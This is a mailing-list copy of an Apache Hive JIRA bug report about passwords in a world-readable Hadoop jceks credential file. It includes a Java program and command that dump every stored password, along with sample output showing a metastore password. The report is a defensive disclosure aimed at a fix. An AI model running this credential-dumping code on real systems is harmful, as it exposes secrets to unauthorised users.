You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@hive.apache.org by "Oleksiy Sayankin (JIRA)" <ji...@apache.org> on 2018/05/31 11:02:00 UTC
[jira] [Created] (HIVE-19746) Hadoop credential provider allows to
read passwords
Oleksiy Sayankin created HIVE-19746:
---------------------------------------
Summary: Hadoop credential provider allows to read passwords
Key: HIVE-19746
URL: https://issues.apache.org/jira/browse/HIVE-19746
Project: Hive
Issue Type: Bug
Reporter: Oleksiy Sayankin
Assignee: Oleksiy Sayankin
This simple program allows to read any password from any {{jceks}} file:
{code}
package com.test.app;
import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;
import java.io.IOException;
public class PasswordReader {
public static void main(String[] args) throws IOException {
if (args == null || args.length == 0){
throw new IllegalArgumentException("Credential provider path is to set");
}
String credentialProviderPath = args[0];
Configuration configuration = new Configuration();
configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
List<String> aliases = credentialProvider.getAliases();
for(String alias : aliases){
System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
}
}
}
{code}
{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
{code}
*RESULT*
{code}
javax.jdo.option.connectionpassword = 123456
{code}
File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{\-rw\-r\-\-r\-\-}} permissions and {{hdfs:hdfs}} owner:group. We can't remove world readable permissions here, because Hive is configured for impersonation to allow users user than {{hdfs}} connect to HiveServer2. When removed world readable permissions I got the exception:
{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}
Any ideas how to protect passwords?
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)